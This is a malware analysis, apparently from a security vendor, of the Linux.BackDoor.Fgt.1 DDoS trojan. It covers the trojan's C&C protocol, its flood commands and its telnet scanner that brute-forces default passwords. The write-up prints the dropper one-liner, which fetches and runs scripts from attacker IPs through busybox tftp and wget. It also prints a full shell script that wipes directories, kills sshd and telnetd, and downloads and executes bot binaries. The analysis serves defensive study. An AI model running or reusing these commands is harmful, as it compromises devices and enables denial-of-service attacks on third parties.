A Trojan targeting Linux devices. There are numerous versions of Linux.BackDoor.Fgt.1 for different Linux distributions, including distributions for MIPS and SPARC architectures. The malicious program is designed to carry out DDoS attacks.
During initialization on the infected device, Linux.BackDoor.Fgt.1 gets the current time value and the ID of its own running process. Then the Trojan applies the XOR operation to the generated values and uses the result as a seed for the random number generator.
void __cdecl init_rand(DWORD seed)
{
DWORD i; // [sp+Ch] [bp-4h]@1
Q[0] = seed;
Q[1] = seed - 0x61C88647;
Q[2] = seed + 0x3C6EF372;
for ( i = 3; i <= 4095; ++i )
{
Q[i] = Q[i - 2] ^ Q[i - 3] ^ i ^ 0x9E3779B9;
}
}By referring to one of Google services (8.8.8.8:53), the Trojan verifies if an Internet connection is established. If the connection is established, the malware calls the getsockname and ioctl functions with the parameter SIOCGIFHWADDR. As a result, the Trojan receives IP and MAC addresses of the infected device.
After initialization is completed, Linux.BackDoor.Fgt.1 attempts to establish a connection to the command and control server whose address is stored in the Trojan’s body in one of the following formats:
aaa.bbb.ccc.dddor
aaa.bbb.ccc.ddd:portIf the first format is used, the Trojan attempts to establish a connection to port 1776. Once the connection is established, Linux.BackDoor.Fgt.1 sends the following string to the command and control server:
"BUILD %s\nPING"where %s is the key phrase which stands for the Trojan’s version, for example, NEW WORLD ORDER.
In reply, the server sends a 4,096-byte buffer removing spaces at the beginning and at the end of it. If the buffer contains the PING command, the Trojan replies with PONG and continues to operate on the infected device. If Linux.BackDoor.Fgt.1 receives the DUP command, the malware terminates its work.
The buffer looks as follows:
!string cmd arg_list\0where “string” and “cmd” stand for ASCII strings, separated by a space; arg_list stands for an array of ASCII strings, separated either by spaces or by the '\n' value.
The Trojan modifies the data in the “cmd” string into uppercase letters and then compares it to the data in the SH string. If the strings match, arg_list indicates a list of commands to be executed using “sh -c”, and the command output will be sent to the command and control server.
Otherwise, arg_list is split into substrings (every space character and every string break character are replaced with \0) and the command buffer is generated as follows:
char * pCmdBuffer[] = { cmd, arg0, arg1, ... };where “cmd” stands for the string containing a command, strings arg0, arg1,... stand for command arguments.
Linux.BackDoor.Fgt.1 can execute the following commands:
| Command | Description | Reply | Command format |
|---|---|---|---|
| PING | Test the connection | PONG | |
| GETLOCALIP | Get the infected device’s IP | “My IP: %s”, where %s is replaced with textual representation of the infected device’s IP. | |
| SCANNER | Scanner’s status change | If the incoming command does not contain additional parameters, the reply will look as follows: SCANNER ON | OFF. Otherwise, if the command contains the additional parameter OFF, the reply will not be sent. Otherwise, if the command contains the additional parameter ON, refer to the SCANNER section (below). | |
| DNS | DNS Amplification | "DNS <target> <port (0 for random)> <time> <some data> <domain for resolving> <num of packets> " | |
| UDP | UDP Flood | "UDP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> (packet size, usually 0) (time poll interval, default 10)" | |
| TCP | SYN Flood | "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)" | |
| JUNK | Generate random traffic | "JUNK <ip> <port> <time>" | |
| HOLD | Generate random traffic | "HOLD <ip> <port> <time>" | |
| RANDOM | UDP Flood | "RANDOM <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> (packet size, usually 0) (time poll interval, default 10)" | |
| KILLATK | Terminate a DDoS attack | ||
| LOLNOGTFO | Terminate backdoor’s working processes |
During one cycle, the Trojan can scan 256 IP addresses of remote devices. To generate a list of addresses, the Trojan uses the following algorithm:
The malware initializes the array containing 256 st_scan_data structures and sends the “Starting gayscan” string to the server.
#pragma pack(push, 1)
struct st_scan_data
{
_DWORD socket;
_DWORD RndPublicIp;
_BYTE state;
_BYTE disconnected;
_BYTE UsernameIndex;
_BYTE PasswordsIndex;
_DWORD time;
_WORD pos;
_BYTE *buffer;
};
#pragma pack(pop)- Linux.BackDoor.Fgt.1 generates a random public IP address (the following ranges are not allowed: 10.*.*.*, 127.*.*.*, 169.254.*.*, 100.64+,*.*, 172.16-.*.*, 192.0.2.*, 192.88.99.*, 192.168.*.*, 198.18.*.*, 198.19.*.*, 198.51.100.*, 203.0.113.*, 224+.*.*.*) and attempts to establish a connection. If the attempt fails, the Trojan sends the following report to the command and control server:
where the first %d argument stands for the structure number, while the second %d argument stands for the IP address."[%d:%d] socket couldn't init" "[%d:%d] socket dead, rip" - Then the Trojan sets socket parameters. If the attempt fails, the malware sends the following report to the command and control server:
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] couldn't select, rip" "[%d:%d] sockets are set up, commencing" - Next, the malware reads the data from the remote host searching the following strings for the request to enter login/password:
If it succeeds, the Trojan sends the following message to the command and control server:"user" "login" "pass" "dvrdvs" "name"
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status;"[%d:%d] login prompt found"
or
if during a 10-second period the Trojan does not receive the necessary data from the remote host."[%d:%d] timed out" - The Trojan sends the following information to the command and control server:
"[%d:%d] sending username %s [%s]"Following arguments: structure number, status, login, password.
Login is selected from the following list:
"root" "admin"Password is selected from the following list:
"root" "admin" "12345" "" (empty string) - Depending on the error received from the attacked host, the following messages can be sent to the command and control server:
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] couldn't send newline" "[%d:%d] couldn't send username" - In the received reply, Linux.BackDoor.Fgt.1 searches for the strings indicating request for the password. If one of the strings is found, the malware sends the following string to the command and control server:
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] password prompt found" - The Trojan sends the password to the host and the following message to the command and control server:
Following arguments: structure number, status, login, password."[%d:%d] sending password %s [%s]"If a failure occurs, sends one of the following messages to the command and control server:
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] couldn't send newline" "[%d:%d] couldn't send password" - The Trojan searches for the following strings in the reply it receives from the attacked host:
If a match is found, the malware checks the reply for the strings indicating a failed authentication attempt:"invalid" "incorrect" "fail" "again" "wrong" "accessdenied" "error" "bad" "success" "busybox" "shell" "dvrdvs"
If one of them is found, the Trojan sends the following string to the command and control server:"invalid" "incorrect" "fail" "again" "wrong" "accessdenied" "error" "bad"
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] incorrect" - Then the Trojan sends the following string to the command and control server:
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] writing the gay echo -e"The malware sends the echo command to the attacked host.
If a failure occurs, the Trojan sends the following string to the command and control server:"echo -e '\\x67\\x61\\x79\\x66\\x67\\x74'\r\n"
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] error sending gayfgt confirmation" - The Trojan verifies that the echo command was executed successfully by checking the host’s reply for the “gayfgt” string. Then it sends the following string to the command and control server:
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] gayfgt found or timed out"Next, the malware sends the following string:
with the following arguments: IP of the host (with specified login and password), login, and password."REPORT %s:%s:%s" - The following string is sent to the command and control server:
where the first %d argument stands for the structure number and the second %d argument stands for the task execution status."[%d:%d] shitting on your moms chest"The following command is sent to the attacked host:
The Trojan verifies that the command was executed successfully by checking the host’s reply for the “binfagt” string.cd /tmp/; busybox tftp 217.71.50.13 -c get bin3; sh bin3.sh; busybox tftp -r bin2.sh -g 217.71.50.13; sh bin2.sh; busybox wget http://192.3.205.154/bin.sh; sh bin.sh; echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n
Then the steps from 1 to 11 are repeated for other 255 structures. Thus, during one scan, 256 random IP addresses are checked.
If the Trojan passes authentication on the attacked host, it sends a command to download a special script which, in turn, downloads an executable file of Linux.BackDoor.Fgt.1 and runs it.
#!/bin/sh
cd /tmp/
rm -f *
rm -rf /tmp/*
rm -rf /home/hik/* && cd /home/hik
rm -rf /var/run/*
sleep 5;
killall telnetx
killall mips
killall mipsel
killall arm
killall ppc
killall arm7
killall superh
killall i586
killall i686
killall sparc
killall .usb
sleep 5;
busybox wget http://192.3.205.154/mips;
cp /bin/busybox ./; cat mips > busybox;
rm mips; cp busybox mips;
rm busybox; ./mips && sleep 2
busybox wget http://192.3.205.154/mipsel;
cp /bin/busybox ./;
cat mipsel > busybox; rm mipsel;
cp busybox mipsel;
rm busybox;
./mipsel && sleep 2
busybox wget http://192.3.205.154/arm;
cp /bin/busybox ./;
cat arm > busybox; rm arm;
cp busybox arm;
rm busybox; ./arm && sleep 3
#busybox wget http://192.3.205.154/arm7;
#cp /bin/busybox ./;
#cat arm7 > busybox; rm arm7;
#cp busybox arm7;
#rm busybox;
#./arm7 && sleep 2
busybox wget http://192.3.205.154/ppc;
cp /bin/busybox ./;
cat ppc > busybox; rm ppc;
cp busybox ppc;
rm busybox;
./ppc && sleep 3
busybox wget http://192.3.205.154/superh;
cp /bin/busybox ./;
cat superh > busybox;
rm superh;
cp busybox superh;
rm busybox;
./superh && sleep 2
busybox wget http://192.3.205.154/i586;
cp /bin/busybox ./;
cat i586 > busybox;
rm i586;
cp busybox i586;
rm busybox;
./i586 &&
sleep 2
busybox wget http://192.3.205.154/i686;
cp /bin/busybox ./;
cat i686 > busybox; rm i686;
cp busybox i686;
rm busybox;
./i686 &&
sleep 2
busybox wget http://192.3.205.154/sparc;
cp /bin/busybox ./;
cat sparc > busybox;
rm sparc;
cp busybox sparc;
rm busybox;
./sparc && sleep 2
sleep 5;
rm -f *
sleep 5;
killall -9 sshd
killall -9 telnetdIt should be noted that there are numerous executable files of Linux.BackDoor.Fgt.1 stored on cybercriminals’ server. These files are compiled for different Linux versions and distributions, including distributions for MIPS and SPARC architectures. Thus, the Trojan can infect not only Linux servers and workstations connected to the Internet but also other devices, for example, routers.
